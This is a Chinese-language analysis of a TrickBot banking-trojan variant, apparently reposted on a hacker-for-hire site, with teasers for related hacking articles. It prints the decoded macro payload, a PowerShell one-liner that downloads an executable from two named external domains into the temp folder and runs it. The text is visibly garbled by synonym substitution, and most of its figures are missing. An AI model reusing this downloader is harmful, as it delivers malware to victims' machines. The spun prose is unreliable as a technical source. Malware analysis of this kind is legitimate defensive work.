TrickBot银行木马归来突击全球金融机构

访客6年前关于黑客接单1193

一、布景
最近国外安全研究人员发现TrickBot银行木马最新的样本,深服气EDR安全团队对此事进行了相关跟进,获取到了相应的样本,并对样本进行了详细剖析,承认此样本为TrickBot银行盗号木马的最新变种样本,而且此样本十分活泼,最近一段时间更新十分频频。
TrickBot银行木马是一款专门针对各国银行进行进犯的歹意样本,它之前被黑客团伙用于进犯全球多个国家的金融机构,主要是经过垃圾邮件的 *** 进行进犯,此次发现的样本会对全球数百家大型银行网站进行进犯,部分银行列表如下:

二、样本运转流程

三、样本剖析
邮件附件DOC样本(重命名为Trickbot.doc),如下所示:

打开文档之后,如下所示:

剖析DOC文件档,发现里边包括VBA宏代码,如下所示:

经过VBA宏编辑器解析DOC文档中的宏代码,如下所示:

动态调试解密里边的宏代码,经过CMD /C履行如下PowerShell脚本:
powershell “function [随机名]([string] $[随机名]){(new-object system.net.webclient).downloadfile($[随机名],’%temp%[随机名].exe’);
start-process ‘%temp%[随机名].exe’;}
try{[随机名](‘http://whitakerfamily.info/ico.ico‘)}catch{[随机名](‘http://rayanat.com/ico.ico‘)}
经过powershell脚本下载相应的TrickBot歹意程序,并履行。
TrickBot母体程序(随机名重命名为TrickBot.exe),如下所示:

1.读取样本相应的资源数据到内存中,如下所示:

资源的ID:BBVCXZIIUHGSWQ,资源数据如下所示:

2.创立窗口,发送音讯,如下所示:

3.对获取到的资源数据进行加解密相关操作,如下所示:

从程序中导入密钥1,如下所示:

从程序中导入密钥2,如下所示:

最终经过CryptEncrypt对数据进行操作,如下所示:

履行之后,在内存中将资源数据复原为一个Payload的数据,如下所示:

4.然后在内存加载复原出来的payload数据,如下所示:

5.复原出来的payload其实是一个DLL,内存加载DLL,如下所示:

定位到DLL的进口点:10001900处,如下所示:

6.判别DLL的进口函数是否为shellcode_main,如下所示:

[1] [2] [3] [4]  黑客接单网

相关文章

某入群题之指令履行字符约束绕过(WEB100)

某入群题又来啦!因为之前刚好做了下hitcon的两个指令履行绕过,问了下pcat能不能写这篇文章。然后他说随意我…..这儿就记载一下。看题! 相似前次的两题,仅仅这次字符长度约束变成了20。心中一喜,...

Java Web 工程源代码安全审计实战,第 1 部分: 跨站 XSS

 Java Web 运用安全问题日益严峻。源代码审计能够防备于未然。源代码审计人员要经过实战审计练习,才干熟练掌握 Java Web 源代码安全思路和技巧。 前语 Web 运用是互联网运用的重要方式...

Web前端安全探秘:技能理论与实际使用

Web前端安满是个新概念,能够理解为它是Web安全防护范畴的一部分。 早些时候,曾被狭义的以为前端安全即JS安全。却是没有错,但不全面。现在来看,应该说:前端代码安全(JS代码安全)+ 前端进犯侵略防...

一份来源未知的数据,揭秘了OilRig组织的全部信息(下)-黑客接单平台

Webshells Webshell用于与受感染服务器交互。走漏数据中包含了三个webshell,分别为HyperShell、HighShell和Minion,Minion很可能是HighShell的...

一个CMS事例实战解说PHP代码审计入门

前语 php代码审计介绍:望文生义便是查看php源代码中的缺陷和错误信息,剖析并找到这些问题引发的安全漏洞。 1、环境建立: 工欲善其事必先利其器,先介绍代码审计必要的环境建立 审计环境 window...

怎么高效使用你所“绑架”的HTTP会话?

HTTP会话绑架 HTTP是无状况的协议,为了保持和盯梢用户的状况,引入了Cookie和Session,但都是根据客户端发送cookie来对用户身份进行辨认,所以说拿到了cookie,就能够取得vic...